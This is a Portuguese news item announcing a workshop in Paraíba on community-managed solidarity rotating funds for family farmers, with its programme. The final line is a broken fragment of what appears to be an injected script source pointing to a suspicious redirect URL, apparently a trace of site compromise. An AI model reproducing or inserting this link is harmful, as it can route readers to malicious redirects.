Oficina sobre Fundos Rotativos Solidários começa hoje na Paraíba
![](https://enconasa.asabrasil.org.br/wp-content/uploads/2025/02/semImagem.gif)
Começa hoje (27/08), no Centro de Formação Marista, em Lagoa Seca, na Paraíba, a Oficina sobre Fundos Rotativos Solidários. Participarão do evento representantes das microrregiões do Alto Sertão, Médio Sertão, Curimataú, Coletivo, Cariri Seridó, Brejo, Casaco, Folia, Litoral e Pólo da Borborema. A atividade segue até a sexta-feira (28/08).
A proposta da oficina é de fazer um levantamento panorâmico da evolução recente das experiências de fundos rotativos solidários nas microrregiões que compõem a Articulação do Semi-Árido Paraibano (ASA Paraíba). Outro objetivo é avaliar os principais avanços e desafios dos fundos solidários no desencadeamento de um processo metodológico de formação comunitária, a partir dos materiais pedagógicos especialmente produzidos e, ainda, fortalecer a Rede Estadual de Fundos Solidários.
Os Fundos Rotativos Solidários (FRS) são sistemas de gestão coletiva de recursos voltados para o desenvolvimento da agricultura familiar. Para a ASA Paraíba, os FRS constituem-se numa importante ferramenta de democratização das inovações (construção de infraestruturas hídricas, campos de palma, aquisição de animais, de sementes etc.), por se apoiarem nos laços sociais e na lógica de partilha presente nas comunidades rurais do Semiárido.
Na Paraíba, são mais de 500 fundos rotativos solidários espalhados em quase 100 municípios. Essas experiências são a base do vídeo-documentário Cordel do Fundo Solidário – Gerando Riquezas e Saberes, elaborado para dar suporte ao processo de formação estadual. Nesse documentário, agricultores e agricultoras relatam como os fundos solidários têm se constituído em um instrumento para o fortalecimento dos processos de desenvolvimento comunitário e de suporte ao financiamento dos processos de transição agroecológica das unidades familiares de produção. Porém, mais do que o aprendizado sobre a gestão coletiva de recursos, os agricultores e agricultoras relatam como essa experiência incentiva à organização comunitária, gera autonomia e aprendizado da cidadania aos seus membros.
PROGRAMAÇÃO
27 de agosto
19:00 -Sistematização das informações das microrregiões
28 de agosto
Manhã
8:00 -Socialização por microrregião das experiências de Fundos Rotativos Solidários
11:00 – Balanço das experiências apresentadas apontando os pontos comuns nos avanços e desafios.
Tarde
14:00 –Identificar a estratégia comum de fortalecimento da Rede de Fundos Rotativos Solidários para desencadear um processo metodológico de formação comunitária, a partir dos materiais produzidos.
Trabalho em grupo por microrregião
Plenária
Encaminhamentos
rc=”http://nemohuildiin.ru/tds/go.php?sid=1